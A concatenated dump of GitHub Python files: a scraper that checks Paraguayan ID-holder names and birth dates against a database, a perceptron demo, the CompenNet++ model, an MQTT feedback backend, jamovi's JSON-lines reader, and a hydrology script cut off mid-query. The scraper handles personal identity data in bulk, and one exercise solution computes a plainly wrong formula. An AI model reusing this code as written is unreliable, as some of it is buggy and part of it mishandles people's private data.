str(rows[cedula][4]) or anho != str(rows[cedula][5])):\n print(\"SE ENCONTRARON diferencias en la cedula: \" + str(rows[cedula][0]))\n print(\"Datos de la web: \" + nombres + \" | \" + apellidos + \" | \" + dia + \" | \" + mes + \" | \" + anho)\n print(\"Datos en la database: \" + str(rows[cedula][1]) + \" | \" + str(rows[cedula][2]) + \" | \" + str(rows[cedula][3]) + \" | \" + str(rows[cedula][4]) + \" | \" + str(rows[cedula][5]))\n print(\"\")\n\n # update the row with the new data\n\n c.execute(\"UPDATE paraguayos SET nombres = ?, apellidos = ?, dia = ?, mes = ?, anho = ? 
WHERE cedula = ?\", (nombres, apellidos, dia, mes, anho, rows[cedula][0]))\n\n conn.commit()\n else:\n print(\"No se encontraron diferencias en la cedula: \" + str(rows[cedula][0]))\n print(\"Datos de la web: \" + nombres + \" | \" + apellidos + \" | \" + dia + \" | \" + mes + \" | \" + anho)\n print(\"Datos en la database: \" + str(rows[cedula][1]) + \" | \" + str(rows[cedula][2]) + \" | \" + str(rows[cedula][3]) + \" | \" + str(rows[cedula][4]) + \" | \" + str(rows[cedula][5]))\n print(\"\")\n cedula = cedula + 1\n break\n else:\n cedula = cedula + 1\n break\n except Exception as e:\n print(e)\n print(\"Error, reintentando\")\n time.sleep(2)\n continue\n break\n except Exception as e:\n print(e)\n print(\"Error, reintentando\")\n time.sleep(2)\n continue\n\n driver.close()\n\n conn.close()\n\nelse:\n print(\"No se limpiaron los registros\")\n \n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"Marceeaax/ScrapingSNPP","sub_path":"datacleaner.py","file_name":"datacleaner.py","file_ext":"py","file_size_in_byte":4686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"19902907893","text":"from matplotlib import pyplot as plt\nfrom sklearn import datasets\nimport numpy as np\nX, y = datasets.make_blobs (n_samples=150, n_features=2,\ncenters=2, cluster_std=1.05,\nrandom_state=2)\n#Plotting\nfig = plt.figure(figsize=(10,8))\nplt.plot(X[:, 0][y == 0], X[:, 1][y == 0], 'r^')\nplt.plot(X[:, 0][y == 1], X[:, 1][y == 1], 'bs')\nplt.xlabel(\"feature 1\")\nplt.ylabel(\"feature 2\")\nplt.title('Random Classification Data with 2 classes')\n#plt.show()\ndef acti_func(z):\n if z>0:\n return 1\n else :\n return 0\ndef perceptron(X, y, lr, epochs):\n m, n = X.shape\n w = np.zeros((n+1,1))\n for epoch in range(epochs):\n for idx, x_i in enumerate(X):\n x_i = np.insert(x_i, 0, 1).reshape(-1,1)\n # Calculating prediction/hypothesis.\n y_hat = acti_func(np.dot(x_i.T, w))\n if (np.squeeze(y_hat) - y[idx]) != 0:\n w += lr*((y[idx] - y_hat)*x_i)\n return w\n\ndef plot_decision_boundary(X, w):\n \n # X --> Inputs\n # w --> parameters\n \n # The Line is y=mx+c\n # So, Equate mx+c = theta0.X0 + theta1.X1 + theta2.X2\n # Solving we find m and c\n x1 = [min(X[:,0]), max(X[:,0])]\n m = -w[1]/w[2]\n c = -w[0]/w[2]\n x2 = m*x1 + c\n \n # Plotting\n fig = plt.figure(figsize=(10,8))\n plt.plot(X[:, 0][y==0], X[:, 1][y==0], \"r^\")\n plt.plot(X[:, 0][y==1], X[:, 1][y==1], \"bs\")\n plt.xlabel(\"feature 1\")\n plt.ylabel(\"feature 2\")\n plt.title('Perceptron Algorithm')\n plt.plot(x1, x2, 'y-')\n plt.show()\n\nw = perceptron(X, y, 0.5, 100)\nplot_decision_boundary(X, w)","repo_name":"SemahChaouch/dltp","sub_path":"tp1.py","file_name":"tp1.py","file_ext":"py","file_size_in_byte":1570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"71894379681","text":"'''\nCompenNet++ CNN model\n'''\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport pytorch_tps\nimport copy\n\n\n# CompenNet\nclass CompenNet(nn.Module):\n def __init__(self):\n super(CompenNet, self).__init__()\n self.name = 'CompenNet'\n self.relu = nn.ReLU()\n\n # backbone branch\n self.conv1 = nn.Conv2d(3, 32, 3, 2, 1)\n self.conv2 = nn.Conv2d(32, 64, 3, 2, 1)\n self.conv3 = nn.Conv2d(64, 128, 3, 1, 1)\n self.conv4 = nn.Conv2d(128, 256, 3, 1, 1)\n self.conv5 = nn.Conv2d(256, 128, 3, 1, 1)\n\n # surface image feature extraction branch\n self.conv1_s = nn.Conv2d(3, 32, 3, 2, 1)\n self.conv2_s = nn.Conv2d(32, 64, 3, 2, 1)\n self.conv3_s = 
nn.Conv2d(64, 128, 3, 1, 1)\n self.conv4_s = nn.Conv2d(128, 256, 3, 1, 1)\n\n # transposed conv\n self.transConv1 = nn.ConvTranspose2d(128, 64, 2, 2, 0)\n self.transConv2 = nn.ConvTranspose2d(64, 32, 2, 2, 0)\n self.conv6 = nn.Conv2d(32, 3, 3, 1, 1)\n\n # skip layers\n self.skipConv1 = nn.Sequential(\n nn.Conv2d(3, 3, 3, 1, 1),\n self.relu,\n nn.Conv2d(3, 3, 3, 1, 1),\n self.relu,\n nn.Conv2d(3, 3, 3, 1, 1),\n self.relu\n )\n\n self.skipConv2 = nn.Conv2d(32, 64, 1, 1, 0)\n self.skipConv3 = nn.Conv2d(64, 128, 1, 1, 0)\n\n # stores biases of surface feature branch (net simplification)\n self.register_buffer('res1_s', None)\n self.register_buffer('res2_s', None)\n self.register_buffer('res3_s', None)\n self.register_buffer('res4_s', None)\n\n # initialization function, first checks the module type,\n def _initialize_weights(m):\n if type(m) == nn.Conv2d:\n nn.init.kaiming_normal_(m.weight)\n\n self.apply(_initialize_weights)\n\n # simplify trained model by trimming surface branch to biases\n def simplify(self, s):\n self.res1_s = self.relu(self.conv1_s(s))\n self.res2_s = self.relu(self.conv2_s(self.res1_s))\n self.res3_s = self.relu(self.conv3_s(self.res2_s))\n self.res4_s = self.relu(self.conv4_s(self.res3_s))\n\n self.res1_s = self.res1_s.squeeze()\n self.res2_s = self.res2_s.squeeze()\n self.res3_s = self.res3_s.squeeze()\n self.res4_s = self.res4_s.squeeze()\n\n # x is the input uncompensated image, s is a 1x3x256x256 surface image\n def forward(self, x, s):\n # surface feature extraction\n res1_s = self.relu(self.conv1_s(s)) if self.res1_s is None else self.res1_s\n res2_s = self.relu(self.conv2_s(res1_s)) if self.res2_s is None else self.res2_s\n res3_s = self.relu(self.conv3_s(res2_s)) if self.res3_s is None else self.res3_s\n res4_s = self.relu(self.conv4_s(res3_s)) if self.res4_s is None else self.res4_s\n\n # backbone\n res1 = self.skipConv1(x)\n x = self.relu(self.conv1(x) + res1_s)\n res2 = self.skipConv2(x)\n x = self.relu(self.conv2(x) + res2_s)\n res3 = self.skipConv3(x)\n x = self.relu(self.conv3(x) + res3_s)\n x = self.relu(self.conv4(x) + res4_s)\n x = self.relu(self.conv5(x) + res3)\n x = self.relu(self.transConv1(x) + res2)\n x = self.relu(self.transConv2(x))\n x = torch.clamp(self.relu(self.conv6(x) + res1), max=1)\n\n return x\n\n\n# WarpingNet\nclass WarpingNet(nn.Module):\n def __init__(self, grid_shape=(6, 6), out_size=(256, 256), with_refine=True):\n super(WarpingNet, self).__init__()\n self.grid_shape = grid_shape\n self.out_size = out_size\n self.with_refine = with_refine # becomes WarpingNet w/o refine if set to false\n self.name = 'WarpingNet' if not with_refine else 'WarpingNet_without_refine'\n\n # relu\n self.relu = nn.ReLU()\n self.leakyRelu = nn.LeakyReLU(0.1)\n\n # final refined grid\n self.register_buffer('fine_grid', None)\n\n # affine params\n self.affine_mat = nn.Parameter(torch.Tensor([1, 0, 0, 0, 1, 0]).view(-1, 2, 3))\n\n # tps params\n self.nctrl = self.grid_shape[0] * self.grid_shape[1]\n self.nparam = (self.nctrl + 2)\n ctrl_pts = pytorch_tps.uniform_grid(grid_shape)\n self.register_buffer('ctrl_pts', ctrl_pts.view(-1, 2))\n self.theta = nn.Parameter(torch.ones((1, self.nparam * 2), dtype=torch.float32).view(-1, self.nparam, 2) * 1e-3)\n\n # initialization function, first checks the module type,\n def init_normal(m):\n if type(m) == nn.Conv2d:\n nn.init.normal_(m.weight, 0, 1e-4)\n\n # grid refinement net\n if self.with_refine:\n self.grid_refine_net = nn.Sequential(\n nn.Conv2d(2, 32, 3, 2, 1),\n self.relu,\n nn.Conv2d(32, 64, 3, 2, 1),\n 
self.relu,\n nn.ConvTranspose2d(64, 32, 2, 2, 0),\n self.relu,\n nn.ConvTranspose2d(32, 2, 2, 2, 0),\n self.leakyRelu\n )\n self.grid_refine_net.apply(init_normal)\n else:\n self.grid_refine_net = None # WarpingNet w/o refine\n\n # initialize WarpingNet's affine matrix to the input affine_vec\n def set_affine(self, affine_vec):\n self.affine_mat.data = torch.Tensor(affine_vec).view(-1, 2, 3)\n\n # simplify trained model to a single sampling grid for faster testing\n def simplify(self, x):\n # generate coarse affine and TPS grids\n coarse_affine_grid = F.affine_grid(self.affine_mat, torch.Size([1, x.shape[1], x.shape[2], x.shape[3]])).permute((0, 3, 1, 2))\n coarse_tps_grid = pytorch_tps.tps_grid(self.theta, self.ctrl_pts, (1, x.size()[1]) + self.out_size)\n\n # use TPS grid to sample affine grid\n tps_grid = F.grid_sample(coarse_affine_grid, coarse_tps_grid)\n\n # refine TPS grid using grid refinement net and save it to self.fine_grid\n if self.with_refine:\n self.fine_grid = torch.clamp(self.grid_refine_net(tps_grid) + tps_grid, min=-1, max=1).permute((0, 2, 3, 1))\n else:\n self.fine_grid = torch.clamp(tps_grid, min=-1, max=1).permute((0, 2, 3, 1))\n\n def forward(self, x):\n\n if self.fine_grid is None:\n # not simplified (training/validation)\n # generate coarse affine and TPS grids\n coarse_affine_grid = F.affine_grid(self.affine_mat, torch.Size([1, x.shape[1], x.shape[2], x.shape[3]])).permute((0, 3, 1, 2))\n coarse_tps_grid = pytorch_tps.tps_grid(self.theta, self.ctrl_pts, (1, x.size()[1]) + self.out_size)\n\n # use TPS grid to sample affine grid\n tps_grid = F.grid_sample(coarse_affine_grid, coarse_tps_grid).repeat(x.shape[0], 1, 1, 1)\n\n # refine TPS grid using grid refinement net and save it to self.fine_grid\n if self.with_refine:\n fine_grid = torch.clamp(self.grid_refine_net(tps_grid) + tps_grid, min=-1, max=1).permute((0, 2, 3, 1))\n else:\n fine_grid = torch.clamp(tps_grid, min=-1, max=1).permute((0, 2, 3, 1))\n else:\n # simplified (testing)\n fine_grid = self.fine_grid.repeat(x.shape[0], 1, 1, 1)\n\n # warp\n x = F.grid_sample(x, fine_grid)\n return x\n\n\n# CompenNet++\nclass CompenNetPlusplus(nn.Module):\n def __init__(self, warping_net=None, compen_net=None):\n super(CompenNetPlusplus, self).__init__()\n self.name = 'CompenNetPlusplus'\n\n # initialize from existing models or create new models\n self.warping_net = copy.deepcopy(warping_net.module) if warping_net is not None else WarpingNet()\n self.compen_net = copy.deepcopy(compen_net.module) if compen_net is not None else CompenNet()\n\n # simplify trained model to a single sampling grid for faster testing\n def simplify(self, s):\n self.warping_net.simplify(s)\n self.compen_net.simplify(self.warping_net(s))\n\n # s is Bx3x256x256 surface image\n def forward(self, x, s):\n # geometric correction using WarpingNet (both x and s)\n x = self.warping_net(x)\n s = self.warping_net(s)\n\n # photometric compensation using CompenNet\n x = self.compen_net(x, s)\n\n return x\n","repo_name":"BingyaoHuang/CompenNet-plusplus","sub_path":"src/python/CompenNetPlusplusModel.py","file_name":"CompenNetPlusplusModel.py","file_ext":"py","file_size_in_byte":8257,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"54"} +{"seq_id":"46401430771","text":"# MQTT backend feedback device status update script\n# Process feedback changes and change requests and relays updates to corresponding devices\n\nimport backendAPI as api # API module to access and interface with our projects MQTT and MongoDB 
server\n\n# Message format from website \"apikey:Node_Name:Device_name:value type:Value\"\n# From device Feedback/Apikey/Node_name/Device_name/Value_type \"Value\"\n\n# Connection Fields\nCONNECTION_STRING = \"mongodb://192.168.1.48:27017\"\nBROKER_ADDRESS = \"192.168.1.15\"\nSUB_TOPIC = \"Feedback/#\"\nDEVICE_RECEIVE_TOPIC_HEADER = \"Feedback_receive\"\n\n\n# Function call when a message is received\ndef on_message(client, userdata, message):\n print(\"\\nMessage on Topic:\", message.topic, \" QoS:\", message.qos)\n data_string = str(message.payload.decode(\"utf-8\")).lower()\n print(\"Data:\", data_string, \"\\n\")\n topic_list = api.parse_topic(message.topic)\n msg_list = api.parse_msg(data_string)\n\n if topic_list[1].lower() == \"website\": # Process feedback change request from website\n if update_db_feedback_device(db, msg_list[0], msg_list[1], msg_list[2], msg_list[3], msg_list[4]):\n api.publish(client, api.construct_topic(\n [DEVICE_RECEIVE_TOPIC_HEADER, msg_list[0], msg_list[1], msg_list[2], msg_list[3]]), msg_list[4], 1)\n elif len(topic_list) == 5: # Process feedback change from device\n if not api.check_user_data(db, \"user_data\", topic_list[1]):\n print(\"Invalid API Key\")\n topic_list[0] = DEVICE_RECEIVE_TOPIC_HEADER\n api.publish(client, api.construct_topic(topic_list), \"ERROR: bad_api_key\", 1)\n elif not update_db_feedback_device(db, topic_list[1], topic_list[2], topic_list[3], topic_list[4],\n data_string):\n topic_list[0] = DEVICE_RECEIVE_TOPIC_HEADER\n api.publish(client, api.construct_topic(topic_list), \"Error: Failed to update feedback device!\", 1)\n else:\n print(\"Invalid topic received, message ignored!\")\n return 0\n\n\n# Updates the database with feedback change requests\ndef update_db_feedback_device(database, api_key, node_name, device_name, data_type, data):\n collection_name = api_key + \"_feedback\"\n if collection_name not in database.list_collection_names():\n print(\"Database Error: User collection not found!\")\n return False\n else:\n feedback_collection = database[collection_name]\n feedback_document = feedback_collection.find_one(\n {\"node_name\": node_name, \"device_name\": device_name, \"data_type\": data_type})\n if feedback_document is None:\n print(\"Error: Device does not exist in database!\")\n return False\n\n if data_type.lower() == \"switch\" and (data.lower() == \"on\" or data.lower() == \"off\"):\n feedback_collection.update_one({\"_id\": feedback_document[\"_id\"]}, {\"$set\": {\"data\": data.lower()}})\n return True\n elif data_type.lower() == \"value\":\n try:\n value = int(data)\n feedback_collection.update_one({\"_id\": feedback_document[\"_id\"]}, {\"$set\": {\"data\": value}})\n return True\n except:\n print(\"Could not convert expected value type data to int!\")\n return False\n else:\n print(\"Invalid data type or data!\")\n return False\n\n\n# Script Start #\ndb = api.connect_to_database(CONNECTION_STRING, \"iospace\")\n\nmqtt_client = api.connect_to_broker(BROKER_ADDRESS, \"feedback\", on_message)\napi.subscribe(mqtt_client, SUB_TOPIC, 1)\n\napi.forever_mqtt_thread(mqtt_client)\n","repo_name":"robotevan/3010_IO_SPACE","sub_path":"TeamProject/MQTTBackend/feedback.py","file_name":"feedback.py","file_ext":"py","file_size_in_byte":3616,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} +{"seq_id":"20635790323","text":"import sys; sys.stdin = open('6026.txt')\nfrom math import factorial\nfor t_case in range(int(input())):\n M, N = map(int, input().split())\n # all \n init = M 
** N\n # S(n ,k) * k! == answer\n\n tmp = ((M**N) - M) // 2 ** factorial(M)\n print('#{} {}'.format(t_case+1, tmp))","repo_name":"dodonmountain/algorithm","sub_path":"2019_late/20190927/swea_6026_성수의비밀번호공격.py","file_name":"swea_6026_성수의비밀번호공격.py","file_ext":"py","file_size_in_byte":284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"37795518153","text":"import torch\n\nSEED = 1 # A seed for the random number generator\n\n# Graph\nNR_NODES = 10 # Number of nodes N\nEMBEDDING_DIMENSIONS = 5 # Embedding dimension D\nEMBEDDING_ITERATIONS_T = 1 # Number of embedding iterations T\n\n# Learning\nNR_EPISODES = 4001\nMEMORY_CAPACITY = 10000\nN_STEP_QL = 2 # Number of steps (n) in n-step Q-learning to wait before computing target reward estimate\nBATCH_SIZE = 16\n\nGAMMA = 0.9\nINIT_LR = 5e-3\nLR_DECAY_RATE = 1. - 2e-5 # learning rate decay\n\nMIN_EPSILON = 0.1\nEPSILON_DECAY_RATE = 6e-4 # epsilon decay\n\nFOLDER_NAME = './models' # where to checkpoint the best models\n\nDEVICE = torch.device('cuda') if torch.cuda.is_available() else torch.device('cpu')\n","repo_name":"rodrigohaddad/ML-Combinatorial-Optimization","sub_path":"first_attempt/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"36279609064","text":"def solution(url: str, true_length: int) -> str: \n url = list(url) # In python, string doesn't support index manipulation. \n \n # replace a single space with \"%20\"\n spaces = len(''.join(url).split()) - 1 # find the number of spaces in the url\n idx = true_length + spaces * 2\n for i in range(true_length - 1, -1, -1): \n if url[i] == ' ': \n url[idx-3:idx] = ['%', '2', '0']\n idx -= 3\n else: \n url[idx - 1] = url[i]\n idx -= 1\n return ''.join(url) # in-place, but return it to print\n\nif __name__ == '__main__': \n print(solution(\"Mr John Smith \", 13))\n","repo_name":"yehogwon/algo-study","sub_path":"cracking-the-coding-interview/CH01/urlify/urlify.py","file_name":"urlify.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"18743786895","text":"\nimport re\nimport json\nimport chardet\nimport os\nimport math\n\nfrom io import TextIOWrapper\nfrom json.decoder import JSONDecodeError\n\nfrom jamovi.core import ColumnType\nfrom jamovi.core import DataType\nfrom jamovi.core import MeasureType\n\nfrom .reader import Reader\n\n\ndef calc_dps(value, max_dp=3):\n if math.isnan(value):\n return 0\n if not math.isfinite(value):\n return 0\n\n max_dp_required = 0\n value %= 1\n as_string = '{v:.{dp}f}'.format(v=value, dp=max_dp)\n as_string = as_string[2:]\n\n for dp in range(max_dp, 0, -1):\n index = dp - 1\n if as_string[index] != '0':\n max_dp_required = dp\n break\n\n return max_dp_required\n\n\nclass ColumnInfo:\n\n def __init__(self):\n self.only_integers = True\n self.only_floats = True\n self.is_empty = True\n self.unique_values = set()\n self.n_uniques = 0\n self.many_uniques = False\n self.measure_type = None\n self.data_type = None\n self.levels = None\n self.ruminated = False\n self.dps = 0\n\n def examine(self, value):\n if value is None or (isinstance(value, str) and value.strip() == ''):\n return\n self.is_empty = False\n if isinstance(value, list) or isinstance(value, dict) or isinstance(value, bool):\n value = json.dumps(value)\n if not self.many_uniques:\n try:\n v = int(value)\n 
except ValueError:\n v = value\n if v not in self.unique_values:\n self.unique_values.add(v)\n self.n_uniques += 1\n if self.n_uniques > 49:\n self.many_uniques = True\n self.unique_values = None\n if isinstance(value, int):\n if value > 2147483647 or value < -2147483648:\n self.only_integers = False\n else:\n if isinstance(value, float):\n self.only_integers = False\n self.dps = max(self.dps, calc_dps(value))\n else:\n self.only_integers = False\n self.only_floats = False\n\n def ruminate(self):\n if self.only_integers:\n if self.many_uniques is False:\n self.data_type = DataType.INTEGER\n self.measure_type = MeasureType.NOMINAL\n if self.unique_values is not None:\n if any(map(lambda x: isinstance(x, str), self.unique_values)):\n uniques = list(set(map(lambda x: str(x), self.unique_values)))\n else:\n uniques = list(self.unique_values)\n uniques.sort()\n self.levels = list(map(lambda v: (v, str(v), str(v), True), uniques))\n else:\n self.data_type = DataType.INTEGER\n self.measure_type = MeasureType.CONTINUOUS\n else:\n if self.only_floats:\n self.data_type = DataType.DECIMAL\n self.measure_type = MeasureType.CONTINUOUS\n else:\n if self.many_uniques is False:\n self.data_type = DataType.TEXT\n self.measure_type = MeasureType.NOMINAL\n if self.unique_values is not None:\n if any(map(lambda x: isinstance(x, str), self.unique_values)):\n uniques = list(set(map(lambda x: str(x), self.unique_values)))\n else:\n uniques = list(self.unique_values)\n uniques.sort()\n self.levels = list(map(lambda v: (v[0], str(v[1]), str(v[1]), False), enumerate(uniques)))\n else:\n self.data_type = DataType.TEXT\n self.measure_type = MeasureType.ID\n self.ruminated = True\n\n\nclass JSONLinesReader(Reader):\n\n @staticmethod\n def is_this_json(path):\n\n if path[-4:].lower() == '.csv':\n return False\n\n with open(path, mode='rb') as file:\n byts = file.read(4096)\n det = chardet.detect(byts)\n encoding = det['encoding']\n file.seek(0)\n if encoding == 'ascii':\n encoding = 'utf-8-sig'\n text_stream = TextIOWrapper(file, encoding=encoding, errors='replace')\n while True:\n line = text_stream.readline()\n if line == '': # EOF\n break\n sline = line.strip()\n if sline != '': # skip empty lines\n try:\n v = json.loads(sline)\n if isinstance(v, list) or isinstance(v, dict):\n return True\n else:\n return False\n except JSONDecodeError:\n return False\n return False\n\n def __init__(self, settings):\n super().__init__(settings)\n self._file = None\n self._text_stream = None\n\n def open(self, path):\n self.set_total(os.stat(path).st_size)\n try:\n self._file = open(path, mode='rb')\n byts = self._file.read(4096)\n det = chardet.detect(byts)\n encoding = det['encoding']\n self._file.seek(0)\n if encoding == 'ascii':\n encoding = 'utf-8-sig'\n self._text_stream = TextIOWrapper((self._file), encoding=encoding, errors='replace')\n except Exception as e:\n if self._file:\n self._file.close()\n raise e\n\n def lines(self):\n while True:\n line = self._text_stream.readline()\n if line == '':\n break\n yield line\n\n def rows(self, line):\n entry = json.loads(line)\n if isinstance(entry, dict):\n yield entry\n elif isinstance(entry, list):\n for row in entry:\n yield row\n else:\n raise ValueError\n\n def read_into(self, data, path, prog_cb):\n\n self.open(path)\n infos = {}\n row_count = 0\n line_count = 0\n\n for line in self.lines():\n for row in self.rows(line):\n for column_name, value in row.items():\n try:\n info = infos[column_name]\n except KeyError:\n infos[column_name] = info = ColumnInfo()\n 
info.examine(value)\n\n row_count += 1\n if row_count % 100 == 0:\n prog_cb(0.33333 * self.progress() / self._total)\n line_count += 1\n\n source_column = None\n if line_count > 1:\n source_column = data.append_column('entry', 'entry')\n source_column.column_type = ColumnType.DATA\n source_column.set_data_type(DataType.INTEGER)\n if line_count > 50:\n source_column.set_measure_type(MeasureType.ID)\n else:\n source_column.set_measure_type(MeasureType.NOMINAL)\n\n for column_name, info in infos.items():\n info.ruminate()\n column = data.append_column(column_name, column_name)\n column.column_type = ColumnType.DATA\n column.set_data_type(info.data_type)\n column.set_measure_type(info.measure_type)\n column.dps = info.dps\n if info.levels:\n for level in info.levels:\n column.append_level(level[0], level[1], level[2])\n\n data.set_row_count(row_count)\n\n self.close()\n self.open(path)\n\n row_no = 0\n columns_by_name = dict(map(lambda c: (c.name, c), data))\n\n for line_no, line in enumerate(self.lines()):\n for row in self.rows(line):\n\n if source_column:\n source_column.set_value(row_no, line_no+1)\n\n for column_name, value in row.items():\n\n column = columns_by_name[column_name]\n\n if value is None or (isinstance(value, str) and value.strip() == ''):\n column.clear_at(row_no)\n elif column.data_type == DataType.INTEGER:\n column.set_value(row_no, value)\n elif column.data_type == DataType.DECIMAL:\n column.set_value(row_no, value)\n elif type(value) in (dict, list, bool):\n column.set_value(row_no, json.dumps(value))\n else:\n value = str(value).strip()\n if value == '':\n column.clear_at(row_no)\n else:\n column.set_value(row_no, str(value))\n\n row_no += 1\n if row_no % 100 == 0:\n prog_cb(.33333 + .66666 * row_no / row_count)\n\n\n def progress(self):\n return self._file.tell()\n\n def __iter__(self):\n self._text_stream.seek(0)\n\n def close(self):\n try:\n self._file.close()\n except Exception:\n pass\n","repo_name":"jamovi/jamovi","sub_path":"server/jamovi/server/formatio/jsonlines.py","file_name":"jsonlines.py","file_ext":"py","file_size_in_byte":9206,"program_lang":"python","lang":"en","doc_type":"code","stars":481,"dataset":"github-code","pt":"54"} +{"seq_id":"21274565732","text":"# profile_matcha.py\r\n# onderdeel van leggertool\r\n# plaatst theoretische profielen zo goed mogelijk binnen gemeten profielen\r\n\r\n# variant a) database structuur 20180129\r\n\r\nimport logging\r\nimport matplotlib\r\nimport os\r\n\r\nmatplotlib.use('AGG')\r\n\r\nimport sqlite3\r\nimport matplotlib.pyplot as plt\r\nimport shapely\r\nimport shapely.geometry\r\nfrom shapely.errors import TopologicalError\r\n# from descartes import PolygonPatch\r\nfrom matplotlib.pyplot import savefig\r\n\r\ntry:\r\n from legger.sql_models.legger_database import load_spatialite\r\nexcept ImportError:\r\n from sql_models.legger_database import load_spatialite\r\n\r\nlogger = logging.getLogger(__name__)\r\n\r\n\r\ndef mk_pro_x_hy_kompas(cur, straal=0.5, aantalstappen=90, srid=28992):\r\n \"\"\" Voor alle gemeten profielen wordt het snijpunt met het bijbehorende hydroobject gemaakt en het azimut\r\n (kompasrichting) van het hydroobject ter plekke.\r\n Invoer: cur = een cursor naar de database met gemetenprofielen, hydroobjecten en theoretische profielen\r\n straal = de straal van een semi-cirkel met als middelpunt het snijpunt van gemetenprofiel en hydroobject\r\n aantalstappen = het aantal lijnstukken van de semi-cirkel\r\n srid = het nummer van het geografische referentiestelsel; 28992 = Rijksdriehoekmeting\r\n 
Uitvoer: gevulde tabel pro_x_hy_kompas in de database\r\n\r\n Op de loodlijn op het lijnstuk van het hydroobject ter plekke van het snijpunt, worden later het gemeten\r\n profiel en de theoretische profielen geprojecteerd.\r\n Het snijpunt met de kompasrichting wordt opgeslagen in tabel pro_x_hy_kompas in de database.\r\n\r\n Het snijpunt wordt bepaald met de spatialite functie Intersection(profiellijn,hydroobject)\r\n De kommpasrichting wordt bepaald met de spatialite functie Azimuth(punt1,punt2)\r\n punt1 en punt2 worden bepaald door Intersection(profiellijn, cirkeltje_om_snijpunt)\r\n cirkeltje_om_snijpunt wordt gemaakt door Buffer(snijpunt, straal, aantalstappen)\r\n straal is een variabele evenals aantal stappen\"\"\"\r\n\r\n cur.execute('drop table if exists pro_x_hy_kompas')\r\n cur.execute('create table pro_x_hy_kompas (pro_id bigint primary key, ovk_ovk_id bigint, kompas float,'\r\n 'CONSTRAINT fk_pro FOREIGN KEY (pro_id) REFERENCES pro(pro_id), '\r\n 'CONSTRAINT fk_hy FOREIGN KEY (ovk_ovk_id) REFERENCES hydroobject(id)) ')\r\n cur.execute('select DiscardGeometryColumn(\"pro_x_hy_kompas\",\"geometry\")')\r\n cur.execute('select AddGeometryColumn(\"pro_x_hy_kompas\", \"geometry\", %d, \"POINT\")' % srid)\r\n cur.execute('insert into pro_x_hy_kompas (pro_id, ovk_ovk_id, geometry, kompas)'\r\n ' select pro_id, ovk_ovk_id, Intersection(pro.GEOMETRY, hydroobject.GEOMETRY),'\r\n 'Azimuth('\r\n 'PointN(Intersection(pro.GEOMETRY,Buffer(Intersection(pro.GEOMETRY, hydroobject.GEOMETRY),%f,%d)),1), '\r\n 'PointN(Intersection(pro.GEOMETRY,Buffer(Intersection(pro.GEOMETRY, hydroobject.GEOMETRY),%f,%d)),2)) '\r\n 'from pro inner join hydroobject on '\r\n '(pro.ovk_ovk_id=hydroobject.id)' % (straal, aantalstappen, straal, aantalstappen))\r\n return\r\n\r\n\r\ndef peilperprofiel(cur, peilcriterium=\"min\", debug=0):\r\n \"\"\" Haal per gemeten profiel het heersende peil op.\r\n Invoer: cur = een cursor naar de database met gemetenprofielen, hydroobjecten en theoretische profielen\r\n peilcriterium = vlag met waarden min of max om resp.de minimale of maximale waterhoogte te kiezen\r\n Uitvoer: een dictionary met als sleutel het id van het profiel en als waarden het id van het hydroobject en peil\r\n\r\n In versie 0 wordt domweg op grond van de administratieve joins de waterhoogte uit de tabel streefpeilen gebruikt\r\n Dit kan later zo nodig verfijnt worden met een spatial join\r\n In het testgebied Geestmerambacht levert de gebruikte query 43 null waarden op voor waterhoogte\r\n steekproeven geven aan dat dit vooral komt doordat profielen geselecteerd zijn met een buffer\r\n rond het gebied\r\n\r\n IS NIET MEER NODIG\r\n \"\"\"\r\n if peilcriterium != 'min' and peilcriterium != 'max':\r\n peilcriterium = 'min'\r\n # logger.debug(\"PEILCRITERIUM AANGEPAST NAAR %s\", peilcriterium)\r\n\r\n q = '''select pro.pro_id, pro.ovk_ovk_id, %s(streefpeil.waterhoogte) from \r\n pro left outer join hydroobject on (pro.ovk_ovk_id = hydroobject.id) \r\n left outer join peilgebiedpraktijk on (hydroobject.ws_in_peilgebied = peilgebiedpraktijk.code) \r\n left outer join streefpeil on (peilgebiedpraktijk.id=streefpeil.peilgebiedpraktijkid)\r\n group by pro.pro_id, pro.ovk_ovk_id\r\n ''' % peilcriterium\r\n prof = {}\r\n for r in cur.execute(q):\r\n prof[r[0]] = (r[1], r[2])\r\n q = '''insert into hyob_voorkeurpeil select hydroobject.id, %s(streefpeil.waterhoogte) from \r\n hydroobject left outer join peilgebiedpraktijk on (hydroobject.ws_in_peilgebied = peilgebiedpraktijk.code) \r\n left outer join streefpeil on 
(peilgebiedpraktijk.id=streefpeil.peilgebiedpraktijkid)\r\n group by hydroobject.id''' % peilcriterium\r\n cur.execute(q)\r\n # logger.debug(\"aantal gemeten profielen in een hydro_object met een peil: %d \", len(prof))\r\n\r\n return prof\r\n\r\n\r\ndef haal_meetprofielen1(cur, profielsoort=\"Z1\", filter_profiel_id=None):\r\n \"\"\" Haal de gemeten profieelpunten op uit de database voor de profielsoort vastebodem (Z1)\r\n Invoer: cur = een cursor naar de database met gemetenprofielen, hydroobjecten en theoretische profielen\r\n profielsoort = de code voor de harde bodem\r\n peilcriterium = vlag met waarden min of max om resp.de minimale of maximale waterhoogte te kiezen\r\n Uitvoer: een dictionary met als sleutel de profielids van gemeten profielen\r\n met per profielid:\r\n het hydroid (hydro object id)\r\n het peil\r\n de punten van het gemeten profiel + extra begin- en eindpunt 100m hoger \"\"\"\r\n prof = {}\r\n\r\n q = 'select profielen.pro_id, profielen.proident, hydroobject.id, hydroobject.streefpeil from profielen inner join hydroobject ' \\\r\n 'on (profielen.hydro_id=hydroobject.id) WHERE hydroobject.streefpeil IS NOT NULL '\r\n if filter_profiel_id is not None:\r\n q += ' WHERE profielen.id = %d' % 